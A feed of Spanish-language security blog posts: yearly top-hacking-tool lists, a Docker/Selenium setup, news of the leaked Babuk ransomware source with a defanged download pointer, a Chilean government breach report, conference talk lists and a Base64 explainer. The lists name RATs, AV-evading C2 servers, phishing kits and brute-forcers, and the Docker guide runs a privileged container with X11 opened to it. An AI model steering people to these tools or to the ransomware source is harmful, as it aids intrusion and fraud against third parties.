Blackploit [PenTest]

Las 20 herramientas de hacking más populares del 2023

noreply@blogger.com (Leo Romero) — Thu, 28 Dec 2023 09:00:00 -0300

En un ranking elaborado por Kitploit, nos muestran las 20 herramientas más populares (con más visitas) durante el 2022. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.

Las herramientas de este año abarcan una amplia gama de disciplinas en ciberseguridad, incluyendo Pruebas de Penetración Mejoradas con IA, Gestión Avanzada de Vulnerabilidades, y mucho más. Sin más, los dejo con la lista:

PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session

Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions

Faraday - Open Source Vulnerability Management Platform

CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools

Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases

Waf-Bypass - Check Your WAF Before An Attacker Does

PentestGPT - A GPT-empowered Penetration Testing Tool

Sirius - First Truly Open-Source General Purpose Vulnerability Scanner

LSMS - Linux Security And Monitoring Scripts

GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM

Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403

ThunderCloud - Cloud Exploit Framework

GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data

Kscan - Simple Asset Mapping Tool

RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry

DNSWatch - DNS Traffic Sniffer and Analyzer

IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File

TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

XSS-Exploitation-Tool - An XSS Exploitation Tool

[+] Saludos y feliz año nuevo!!

Docker y docker-compose para proyecto con Selenium y Python

noreply@blogger.com (Leo Romero) — Wed, 22 Nov 2023 21:54:00 -0300

Hace un tiempo estaba desarrollando un bot que interactuaba con una web. El bot estaba hecho en python y Selenium. Quería dockerizar la aplicación para correrla con un solo comando en cualquier parte y no me encontré con ninguna solución u opción que funcionara o que no tuviera que usar una imagen custom de docker, por lo que hize mi propia versión que corre con un docker seguro no custom en el cual se descargan e instalan todo lo necesario para poder correr tu script en python con selenium. También cree su docker-compose para hacerlo aún más sencillo y poder correrlo en modo gráfico y ver el navegador por pantalla si estoy testeando.

Aquí dejo lo archivos:

requeriments.txt

selenium==4.12.0

Se puede usar con otras versiones de Selenium.

main.py

from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
from selenium.webdriver import ActionChains
...

def main():
	tu_codigo.....

if __name__ == '__main__':
    main()

Dockerfile

FROM python:3.9

# install google chrome
RUN echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" | \
    tee -a /etc/apt/sources.list.d/google.list && \
    wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | \
    apt-key add - && \
    apt-get update && \
    apt-get install -y google-chrome-stable libxss1


RUN BROWSER_MAJOR=$(google-chrome --version | sed 's/Google Chrome \([0-9]*\).*/\1/g') && \
    wget https://googlechromelabs.github.io/chrome-for-testing/LATEST_RELEASE_${BROWSER_MAJOR} -O chrome_version && \
    wget https://storage.googleapis.com/chrome-for-testing-public/`cat chrome_version`/linux64/chromedriver-linux64.zip && \
    unzip chromedriver-linux64.zip && \
    mv chromedriver-linux64/chromedriver /usr/local/bin/ && \
    DRIVER_MAJOR=$(chromedriver --version | sed 's/ChromeDriver \([0-9]*\).*/\1/g') && \
    echo "chrome version: $BROWSER_MAJOR" && \
    echo "chromedriver version: $DRIVER_MAJOR" && \
    if [ $BROWSER_MAJOR != $DRIVER_MAJOR ]; then echo "VERSION MISMATCH"; exit 1; fi


COPY requirements.txt /app/
WORKDIR /app
RUN pip install --no-cache-dir -r requirements.txt

COPY main.py .

ENTRYPOINT ["python", "main.py"]

docker-compose.yml

version: '3.8'

services:
  selenium-script:
    build: .
    environment:
      - DISPLAY=unix$DISPLAY
    volumes:
      - /tmp/.X11-unix:/tmp/.X11-unix
      - .:/app
    privileged: true
    stdin_open: true
    tty: true

Modo de uso

Para correrlo debes ejecutar:

docker-compose run selenium-script

Si quieres poder ver el navegador cuando corras el docker debes darle permiso al usuario docker para que acceda al servidor x11, que es la base de la interfaz gráfica de usuario en estos sistemas Unix.

xhost +local:docker

Espero les sirva
Saludos!!!

Las 20 herramientas de hacking más populares del 2022

noreply@blogger.com (Leo Romero) — Thu, 29 Dec 2022 08:30:00 -0300

Destacan herramientas de Information Gathering, ingeniería social (phishing), entre otras. Sin más, los dejo con la lista:

Zphisher - Automated Phishing Tool

CiLocks - Android LockScreen Bypass

Arkhota - A Web Brute Forcer For Android

GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints

AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING

Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features

Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN

Android_Hid - Use Android As Rubber Ducky Against Another Android Device

Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool

HackingTool - ALL IN ONE Hacking Tool For Hackers

Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux

Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words

Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases

BITB - Browser In The Browser (BITB) Templates

Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks

Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures

Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products

Grafiki - Threat Hunting Tool About Sysmon And Graphs

VLANPWN - VLAN Attacks Toolkit

linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks

[+] Saludos y feliz año nuevo!!

Las 20 herramientas de hacking más populares del 2021

noreply@blogger.com (Leo Romero) — Tue, 28 Dec 2021 09:30:00 -0300

En un ranking elaborado por Kitploit, nos muestran las 20 herramientas más populares (con más visitas) durante el 2021. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.

Destacan herramientas de Information Gathering, ingeniería social (phishing), entre otras. Sin más, los dejo con la lista:

Zphisher - Automated Phishing Tool

Dockerized-Android - A Container-Based Framework To Enable The Integration Of Mobile Components In Security Training Platforms

Emp3R0R - Linux Post-Exploitation Framework Made By Linux User

MurMurHash - Tool To Calculate A MurmurHash Value Of A Favicon To Hunt Phishing Websites On The Shodan Platform

CiLocks - Android LockScreen Bypass

Viper - Intranet Pentesting Tool With Webui

Forbidden - Bypass 4Xx HTTP Response Status Codes

AzureHunter - A Cloud Forensics Powershell Module To Run Threat Hunting Playbooks On Data From Azure And O365

403Bypasser - Automates The Techniques Used To Circumvent Access Control Restrictions On Target Pages

Smuggler - An HTTP Request Smuggling / Desync Testing Tool

Nginxpwner - Tool to look for common Nginx misconfigurations and vulnerabilities

SharpML - Machine Learning Network Share Password Hunting Toolkit

PeTeReport - An Open-Source Application Vulnerability Reporting Tool

Byp4Xx - Simple Bash Script To Bypass "403 Forbidden" Messages With Well-Known Methods Discussed In #Bugbountytips

SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT

Qu1cksc0pe - All-in-One Static Malware Analysis Tool

Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN

Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linuxt

AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING

MOSINT - OSINT Tool For Emails

[+] Saludos y feliz año nuevo!!

El código fuente completo del Ransomware Babuk fue filtrado después de que uno de sus creadores fuera diagnosticado con cáncer terminal

noreply@blogger.com (Leo Romero) — Tue, 7 Sep 2021 18:25:00 -0300

Los operadores de Babuk detuvieron sus operaciones a fines de abril después de atacar al departamento de policía de Washington, DC. La banda del ransomware irrumpió en el Departamento de Policía Metropolitana de Washington, D.C., cifró sus archivos y exigió un rescate de 4 millones de dólares. Los expertos creen que la decisión del grupo de dejar sus actividades podría ser el resultado de haber amenazado al departamento de policía de Estados Unidos.

A finales de mayo, los operadores de ransomware Babuk comenzaron a ofrecerlo a otros ciber-delincuentes para usarlo como servicio RaaS (Ransomware as a Service), relanzandolo como Babuk V2.

Ahora, el grupo de investigación de seguridad vx-underground compartió una noticia, donde un joven ruso, que se cree que es uno de los desarrolladores de la pandilla Babuk, ha sido diagnosticado con cáncer terminal y decidió filtrar el código fuente completo de Babuk para Windows, ESXI. , NAS.

One of the developers for Babuk ransomware group, a 17 year old person from Russia, has been diagnosed with Stage-4 Lung Cancer. He has decided to leaked the ENTIRE Babuk source code for Windows, ESXI, NAS.

You can download the Babuk source here: vx-underground[.]org/tmp/
— vx-underground (@vxunderground) September 3, 2021

Los investigadores de McAfee Enterprise confirmaron que el código fuente es legítimo.

Fuente:

[+] Salu2

Las 20 herramientas de hacking más populares del 2020

noreply@blogger.com (Leo Romero) — Mon, 28 Dec 2020 10:00:00 -0300

En un ranking elaborado por Kitploit, nos muestran las 20 herramientas más populares (con más visitas) durante el 2020. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.

Destacan herramientas de Information Gathering, ingeniería social (phishing), entre otras. Sin más, los dejo con la lista:

Zphisher - Automated Phishing Tool

Onex - A Library Of Hacking Tools For Termux And Other Linux Distributions

Nexphisher - Advanced Phishing Tool For Linux & Termux

Hijacker - All-in-One Wi-Fi Cracking Tools for Android

ANDRAX - Penetration Testing on Android

EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search

HackingTool - ALL IN ONE Hacking Tool For Hackers

GoGhost - High Performance, Lightweight, Portable Open Source Tool For Mass SMBGhost Scan

Web Hacker's Weapons - A Collection Of Cool Tools Used By Web Hackers

TEA - Ssh-Client Worm

RedRabbit - Red Team PowerShell Script

Hacktronian - All In One Hacking Tool For Linux & Android

SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)

BitCracker - BitLocker Password Cracking Tool (Windows Encryption Tool)

SQLMap - Automatic SQL Injection And Database Takeover Tool

WiFi Bruteforcer - Android application to brute force WiFi passwords (No Root Required)

TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)

CQTools - The New Ultimate Windows Hacking Toolkit

Hack-Tools - The All-In-One Red Team Extension For Web Pentester

uDork - Google Hacking Tool

[+] Saludos y feliz año nuevo!!

Hackeo sin presedentes a la infraestructura TI en Chile (Clave única, Gobierno Digital, Comisaría Virtual, Segpres y más han sido vulnerados)

noreply@blogger.com (Leo Romero) — Thu, 15 Oct 2020 03:19:00 -0300

Ayer en la mañana nos desayunamos la noticia de que existió "una posible brecha" en el sistema de clave única de Chile (es una forma centralizada en la cual un ciudadano chileno puede acceder a más de 900 trámites online con una sola contraseña), en la misma mañana salió un comunicado de Gobierno Digital apagando el incendio, diciendo que usaban un robusto sistema de hasheo en sus sistemas y aunque haya existido la brecha no se podía acceder a la clave única, pero igual de todas formas ya habían activado el protocolo de cambio de contraseñas de forma paulatina para evitar problemas.

Ningún sistema es 100% seguro y estas cosas pueden pasar, el protocolo aplicado es el correcto en este tipo de casos, todo "normal" y en el peor de los casos se filtró tu clave única, pero nadie pudo realizar trámites a tu nombre ya que tu contraseña debe ser cambiada en el siguiente logeo (esto le ha pasado a grandes empresas como Dropbox, Linkedin, etc...).

Hasta aquí estamos hablando de un problema grave en la seguridad en un sistema en particular, lo cual afecta de forma seria la funcionalidad de un sistema del Gobierno de Chile que es usado por prácticamente todos los chilenos, más ahora que estamos en pandemia... Pero el problema parecía haber sido amagado de forma correcta y esperábamos que no hubieran más incidencias, eso hasta que un twittero empieza a liberar los leaks de a poco...

Personalmente esperaba que las filtraciones fueran falsas o de bajo impacto, pero cuando empiezo a ver el contenido de los archivos mi peor temor fue confirmado.

No solamente habían vulnerado el sistema de Clave única, habían comprometido toda la infraestructura de Gobierno Digital, infraestructura en la cual se cuenta con proyectos como Clave única, Comisaría Virtual, plataforma de tramites online del Ministerio de Bienes Nacionales, y muchos otros.

La infraestructura está montada en Amazon Web Services ya que uno de los archivos filtrados contiene todas las configuraciones en formato JSON de AWS, donde se encuentran los usuarios, grupos de acceso, políticas de seguridad, además de las funciones lamdas con sus respectivas variables de entorno:

Dentro de los archivos filtrados hay archivos de configuración para VPNs, llaves privadas SSH, muchos dumps de bases de datos SQL y código de aplicaciones, entre otros, en conjunto por el momento son más de 9 GB de archivos, en los cuales hay datos sensibles, contraseñas, nombres, trámites virtuales, API keys, endpoints e información de infraestructura. Al momento de escribir este artículo el usuario en twitter que está filtrando los archivos ya va por el número 16 y pareciera ser que son muchos más dado el nivel de compromiso que se logró en este ataque.

Sin duda un día gris para la democracia digital en Chile. Durante el día es esperable que los medio amplíen la información, pero como no son expertos en la materia quizás no vean el grave impacto que hay producto de este ataque.

Saludos!

Las 20 herramientas de hacking más populares del 2019

noreply@blogger.com (Leo Romero) — Sat, 28 Dec 2019 10:00:00 -0300

En un ranking elaborado por Kitploit, nos muestran las 20 herramientas más populares (con más visitas) durante el 2019. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.

Destacan herramientas de Information Gathering, ingeniería social (phishing), OSINT, entre otras. Sin más, los dejo con la lista:

Hijacker - All-in-One Wi-Fi Cracking Tools for Android

Findomain - The Fastest And Cross-Platform Subdomain Enumerator

EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search

ANDRAX - Penetration Testing on Android

CQTools - The New Ultimate Windows Hacking Toolkit

Sampler - A Tool For Shell Commands Execution, Visualization And Alerting (Configured With A Simple YAML File)

LOIC (Low Orbit Ion Cannon) - A network stress testing application

EasySploit - Metasploit Automation (EASIER And FASTER Than EVER)

ScanQLi - Scanner To Detect SQL Injection Vulnerabilities

SQLMap - Automatic SQL Injection And Database Takeover Tool

OKadminFinder - Admin Panel Finder / Admin Login Page Finder

Shellphish - Phishing Tool For 18 Social Media (Instagram, Facebook, Snapchat, Github, Twitter...)

DNS-Shell - An Interactive Shell Over DNS Channel

QRLJacker - QRLJacking Exploitation Framework

PhoneSploit - Using Open Adb Ports We Can Exploit A Devive

SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)

Instainsane - Multi-threaded Instagram Brute Forcer

Tool-X - A Kali Linux Hacking Tool Installer

Hacktronian - All In One Hacking Tool For Linux & Android

Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos

Fuente: https://kitploit.com

[+] Saludos y feliz año nuevo!!

Material de Black Hat USA 2019 [Presentaciones, Papers y Herramientas]

noreply@blogger.com (Leo Romero) — Wed, 28 Aug 2019 18:14:00 -0400

Black Hat USA es el evento de seguridad de la información más importante del mundo, proporcionando a los asistentes lo último en investigación, desarrollo y tendencias. Todos los años asistentes de todas partes y de cualquier rubro, viajan a la conferencia para aprender lo último en ciberseguridad y hacking.

Este es su año 22° y ya han liberado los vídeos de las presentaciones:

Every Security Team is a Software Team Now
Detecting Deep Fakes with Mice
- Download Presentation Slides
- Download White Paper
Bypassing the Maginot Line: Remotely Exploit the Hardware Decoder on Smartphone
- Download Presentation Slides
- Download White Paper
A Decade After Bleichenbacher '06, RSA Signature Forgery Still Works
- Download Presentation Slides
- Download White Paper
ClickOnce and You're in - When Appref-ms Abuse is Operating as Intended
- Download Presentation Slides
- Download White Paper
Legal GNSS Spoofing and its Effects on Autonomous Vehicles
Biometric Authentication Under Threat: Liveness Detection Hacking
- Download Presentation Slides
- Download White Paper
Battle of Windows Service: A Silver Bullet to Discover File Privilege Escalation Bugs Automatically
- Download Presentation Slides
SSO Wars: The Token Menace
- Download Presentation Slides
- Download White Paper
Monsters in the Middleboxes: Building Tools for Detecting HTTPS Interception
- Download Presentation Slides
Exploiting the Hyper-V IDE Emulator to Escape the Virtual Machine
Hacking for the Greater Good: Empowering Technologists to Strengthen Digital Society
Dragonblood: Attacking the Dragonfly Handshake of WPA3
- Download Presentation Slides
- Download White Paper
The Most Secure Browser? Pwning Chrome from 2016 to 2019
- Download Presentation Slides
- Download White Paper
Attacking and Defending the Microsoft Cloud (Office 365 & Azure AD)
- Download Presentation Slides
PicoDMA: DMA Attacks at Your Fingertips
- Download Presentation Slides
APIC’s Adventures in Wonderland
- Download Presentation Slides
- Download White Paper
- Download Tool
Behind the Scenes: The Industry of Social Media Manipulation Driven by Malware
- Download Presentation Slides
Attacking Electric Motors for Fun and Profit
- Download Presentation Slides
- Download White Paper
Sensor and Process Fingerprinting in Industrial Control Systems
- Download Presentation Slides
HTTP Desync Attacks: Smashing into the Cell Next Door
- Download Presentation Slides
- Download White Paper
- Download Tool
Behind the Scenes of Intel Security and Manageability Engine
- Download Presentation Slides
All the 4G Modules Could be Hacked
- Download Presentation Slides
New Vulnerabilities in 5G Networks
- Download Presentation Slides
- Download White Paper
I’m Unique, Just Like You: Human Side-Channels and Their Implications for Security and Privacy
- Download Presentation Slides
It’s Not What You Know, It’s What You Do: How Data Can Shape Security Engagement
- Download Presentation Slides
Cyber Insurance 101 for CISO’s
- Download Presentation Slides
The Path Less Traveled: Abusing Kubernetes Defaults
Selling 0-Days to Governments and Offensive Security Companies
- Download Presentation Slides
Selling 0-Days to Governments and Offensive Security Companies
- Download Presentation Slides
Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs
- Download Presentation Slides
Integration of Cyber Insurance Into A Risk Management Program
Come Join the CAFSA - Continuous Automated Firmware Security Analysis
- Download Presentation Slides
- Download White Paper
Worm Charming: Harvesting Malware Lures for Fun and Profit
- Download Presentation Slides
MITRE ATT&CK: The Play at Home Edition
- Download Presentation Slides
Look, No Hands! – The Remote, Interaction-less Attack Surface of the iPhone
- Download Presentation Slides
Chip.Fail - Glitching the Silicon of the Connected World
Lessons From Two Years of Crypto Audits
- Download Presentation Slides
Responding to a Cyber Attack with Missiles
- Download Presentation Slides
Finding a Needle in an Encrypted Haystack: Leveraging Cryptographic Abilities to Detect the Most Prevalent Attacks on Active Directory
- Download Presentation Slides
Controlled Chaos: The Inevitable Marriage of DevOps & Security
- Download Presentation Slides
Arm IDA and Cross Check: Reversing the Boeing 787's Core Network
- Download Presentation Slides
The Cyber Shell Game – War, Information Warfare, and the Darkening Web
He Said, She Said – Poisoned RDP Offense and Defense
- Download Presentation Slides
- Download White Paper
How Do Cyber Insurers View The World?
- Download Presentation Slides
Internet-Scale Analysis of AWS Cognito Security
Messaging Layer Security: Towards a New Era of Secure Group Messaging
- Download Presentation Slides
Hacking Your Non-Compete
- Download Presentation Slides
- Download White Paper
Hunting for Bugs, Catching Dragons
- Download Presentation Slides
Flying a False Flag: Advanced C2, Trust Conflicts, and Domain Takeover
- Download Presentation Slides
Going Beyond Coverage-Guided Fuzzing with Structured Fuzzing
- Download Presentation Slides
Transparency in the Software Supply Chain: Making SBOM a Reality
Deconstructing the Phishing Campaigns that Target Gmail Users
Cybersecurity Risk Assessment for Safety-Critical Systems
- Download Presentation Slides
PeriScope: An Effective Probing and Fuzzing Framework for the Hardware-OS Boundary
- Download Presentation Slides
Defense Against Rapidly Morphing DDOS
- Download Presentation Slides
Reverse Engineering WhatsApp Encryption for Chat Manipulation and More
- Download Presentation Slides
Detecting Malicious Files with YARA Rules as They Traverse the Network
- Download Presentation Slides
MINimum Failure - Stealing Bitcoins with Electromagnetic Fault Injection
- Download Presentation Slides
- Download Tool
Mobile Interconnect Threats: How Next-Gen Products May be Already Outdated
- Download Presentation Slides
On Trust: Stories from the Front Lines
- Download Presentation Slides
WebAuthn 101 - Demystifying WebAuthn
- Download Presentation Slides
Attack Surface as a Service
- Download Presentation Slides
Woke Hiring Won’t Save Us: An Actionable Approach to Diversity Hiring and Retention
- Download Presentation Slides
GDPArrrrr: Using Privacy Laws to Steal Identities
- Download Presentation Slides
- Download White Paper
The Future of Securing Intelligent Electronic Devices Using the IEC 62351-7 Standard for Monitoring
- Download Presentation Slides
Testing Your Organization's Social Media Awareness
- Download Presentation Slides
Death to the IOC: What's Next in Threat Intelligence
- Download Presentation Slides
Planning a Bug Bounty: The Nuts and Bolts from Concept to Launch
Playing Offense and Defense with Deepfakes
- Download Presentation Slides
All Your Apple are Belong to Us: Unique Identification and Cross-Device Tracking of Apple Devices
- Download Presentation Slides
The Enemy Within: Modern Supply Chain Attacks
- Download Presentation Slides
Information Security in the Public Interest
Breaking Through Another Side: Bypassing Firmware Security Boundaries from Embedded Controller
- Download Presentation Slides
Project Zero: Five Years of 'Make 0Day Hard'
- Download Presentation Slides
Rough and Ready: Frameworks to Measure Persistent Engagement and Deterrence
- Download Presentation Slides
- Download White Paper
100 Seconds of Solitude: Defeating Cisco Trust Anchor With FPGA Bitstream Shenanigans
Denial of Service with a Fistful of Packets: Exploiting Algorithmic Complexity Vulnerabilities
- Download Presentation Slides
Women in Security: Building a Female InfoSec Community in Korea, Japan, and Taiwan
- Download Presentation Slides
- Download White Paper
Rogue7: Rogue Engineering-Station Attacks on S7 Simatic PLCs
- Download Presentation Slides
- Download White Paper
Operational Templates for State-Level Attack and Collective Defense of Countries
- Download Presentation Slides
- Download White Paper
Process Injection Techniques - Gotta Catch Them All
- Download Presentation Slides
- Download White Paper
- Download Tool
Bounty Operations: Best Practices and Common Pitfalls to Avoid in the First 6-12 Months
DevSecOps : What, Why and How
- Download Presentation Slides
Breaking Encrypted Databases: Generic Attacks on Range Queries
Finding Our Path: How We're Trying to Improve Active Directory Security
API-Induced SSRF: How Apple Pay Scattered Vulnerabilities Across the Web
- Download Presentation Slides
Exploiting Qualcomm WLAN and Modem Over The Air
- Download Presentation Slides
- Download White Paper
Practical Approach to Automate the Discovery and Eradication of Open-Source Software Vulnerabilities at Scale
- Download Presentation Slides
Managing for Success: Maintaining a Healthy Bug Bounty Program Long Term
Ghidra - Journey from Classified NSA Tool to Open Source
Firmware Cartography: Charting the Course for Modern Server Compromise
0-days & Mitigations: Roadways to Exploit and Secure Connected BMW Cars
- Download Presentation Slides
- Download White Paper
Infighting Among Russian Security Services in the Cyber Sphere
- Download Presentation Slides
Behind the scenes of iOS and Mac Security
Zombie Ant Farming: Practical Tips for Playing Hide and Seek with Linux EDRs
- Download Presentation Slides
Predictive Vulnerability Scoring System
- Download Presentation Slides
- Download White Paper
Towards Discovering Remote Code Execution Vulnerabilities in Apple FaceTime
- Download Presentation Slides
Backdooring Hardware Devices by Injecting Malicious Payloads on Microcontrollers
- Download Presentation Slides
- Download White Paper
Securing the System: A Deep Dive into Reversing Android Pre-Installed Apps
- Download Presentation Slides
Preventing Authentication Bypass: A Tale of Two Researchers
- Download Presentation Slides
Automation Techniques in C++ Reverse Engineering
Inside the Apple T2
- Download Presentation Slides
Making Big Things Better the Dead Cow Way
- Download White Paper
Critical Zero Days Remotely Compromise the Most Popular Real-Time OS
- Download Presentation Slides
- Download White Paper
Fantastic Red-Team Attacks and How to Find Them
- Download Presentation Slides
The Discovery of a Government Malware and an Unexpected Spy Scandal
- Download Presentation Slides
Attacking iPhone XS Max
- Download Presentation Slides
Securing Apps in the Open-By-Default Cloud
- Download Presentation Slides
Adventures in the Underland: The CQForensic Toolkit as a Unique Weapon Against Hackers
HostSplit: Exploitable Antipatterns in Unicode Normalization
- Download Presentation Slides
- Download White Paper
Hacking Ten Million Useful Idiots: Online Propaganda as a Socio-Technical Security Project
- Download Presentation Slides
Everybody be Cool, This is a Robbery!
- Download Presentation Slides
A Compendium of Container Escapes
- Download Presentation Slides
The Future of ATO
- Download Presentation Slides
Exploring the New World : Remote Exploitation of SQLite and Curl
- Download Presentation Slides
- Download White Paper
How to Detect that Your Domains are Being Abused for Phishing by Using DNS
- Download Presentation Slides
Debug for Bug: Crack and Hack Apple Core by Itself - Fun and Profit to Debug and Fuzz Apple Kernel by lldb Script
- Download Presentation Slides
Shifting Knowledge Left: Keeping up with Modern Application Security
- Download Presentation Slides
Paging All Windows Geeks – Finding Evil in Windows 10 Compressed Memory
- Download Presentation Slides
- Download White Paper
Breaking Samsung’s ARM TrustZone
- Download Presentation Slides
Command Injection in F5 iRules
- Download Presentation Slides
- Download White Paper
Moving from Hacking IoT Gadgets to Breaking into One of Europe's Highest Hotel Suites
- Download Presentation Slides
Lessons and Lulz: The 5th Annual Black Hat USA NOC Report

Fuente: https://www.cyberhades.com

Presentaciones y Demos de la DEF CON 27 (2019)

noreply@blogger.com (Leo Romero) — Tue, 27 Aug 2019 19:11:00 -0400

Se llevó a cabo del 8 al 11 de agosto del 2019 la DEF CON 27, conferencia que se destaca por llevar a los mejores exponentes mundiales y por ser una de las conferencias más renombradas en el mundo de la seguridad informática, hacking y pentest. Las presentaciones y demos las puedes descargar todas juntas en formato RAR o individualmente:

Via: https://www.cyberhades.com

UnderDOCS Ezine #1 - Agosto 2019 [Descarga PDF]

noreply@blogger.com (Leo Romero) — Mon, 19 Aug 2019 08:30:00 -0400

La comunidad de Underc0de ha publicado la primera versión de su revista digital en la cual podemos encontrar artículos de hacking, ciberseguridad, pentest y programación, entre otros.

Sin duda es una gran iniciativa y se agradece que el conocimiento de la comunidad se formalice en una revista que está bien editada y es fácil de leer.

Los contenidos que se tocan son los siguientes:

Inteligencia Artifical: Redes Sociales Y Realidad
Bypass CSRF Mediante XSS
Bypass SPF
Generación De Un Exploit
Pytorch - Redes Neuronales En Python De Forma Fácil
Introducción Al Interprete De Comandos Linux
¿Cómo Iniciarse En La Programación?
Jupyter Notebook Para Principiantes
Nodejs En Pequeñas Dosis
Python For Kids Para Los Más Y No Tan Pequeños
Web Scraping Con Python Y Beatifulsoap
Revirtiendo Cualquier Controlador
Disquete: Icono Universal De Guardado
OFF TOPIC
Undertools DIY

Los dejo a continuación con UnderDOCS Ezine #1:

Descargar UnderDOCS Ezine #1

Hackeando Todas Las Órdenes De Compra De Una Empresa De Telefonía / Base64 NO es un método de encriptación

noreply@blogger.com (Leo Romero) — Fri, 28 Jun 2019 17:36:00 -0400

Base64 es un sistema de numeración posicional que usa 64 como base. Es la mayor potencia de dos que puede ser representada usando únicamente los caracteres imprimibles de ASCII [1].

Todos los sistemas de numeración tienen una lista de símbolos que utilizan para representar valores, por ejemplo [2]:

Binario: 01
Decimal: 0123456789
Hexadecimal: 0123456789ABCDEF
y para Base64 el conjunto es:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

La función para codificar en Base64 es biyectiva, lo que significa que existe una función que dado un texto encriptado en Base64, esta obtiene el texto original.

base64encode('blackploit') = 'YmxhY2twbG9pdA=='
base64decode('YmxhY2twbG9pdA==') = 'blackploit'

Base64 no es un método de encriptación. Si bien ofusca la información ante la vista normal, se puede obtener la información original muy fácilmente.

Base64 pesa un 33% más que la información original. Esta relación está dada por la relación 8 a 6 bits por carácter, (o sea, un carácter de base64 representa menos información que un carácter normal).

Base64 es muy útil, y sus tres principales usos son:

Transmitir datos en codificaciones conocidas como ASCII o utf-8, sin tener problemas de compatibilidad entre sistemas, lo que permite transmitir binarios también.
Permite pasar a través de URLs caracteres raros o comodines como #/^? sin ser procesados por el navegador.
Puedes visualizar imágenes en Base64, por lo cual puedes guardar tus imágenes como texto en una base de datos y no como archivos en un sistema de ficheros.

Este emoji está en Base64:

<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABt0lEQVQ4jZWTsWtTURTGf+e+mzYpCAZJIBE0piQUS7EgBbN06FDM8ob+CWKMW0fxT3CMiwaDf0GnLt2KdHlTQQeFVmxTRB2C0UESY17uc3g39eWFCPngDvee7zv3u+fcI8TQ36+sA3VgCyjY4zZwCDRTrvc2ypeIcAloAA8AFU9sYYDXwG7K9XqXCaz4ANicIYzjCKimXK83vqkxhxjLbQCIffPxf2zPggHuaqD+7sIo76Phyw/oDQKSC1DICMVMWKKzTkC7E/D7DywtCtfTUCkpdeemqkt3795J9dmw7Jv5rtcKDp4kTlUyQSGXniYogVZN06pplEzHc2lIJigoEWF7zZkiFLPCSl6xklcUs9MZttccRAQNtHc2VLn7K8AfwWIiXFu3/9X0qetw+MEwGMJgCNqBnQ0F0Jb+fuUF8HhM/tTR3Lrmo2I9MQbOv2uWM370+KUGmsAjbBv9ETx/c4XV3JAbaR8EPncd3n9b4P5qfyIn0Bz/xFfAw8tIEDr5+jOsTf7qiOWMHy9mK+V6NW03u0AZ+xuVQCnrU8pO2I3iyGpC23YwqkDLWpsFYznViWGKYt5x/gvnj4PS5kTD9gAAAABJRU5ErkJggg==">

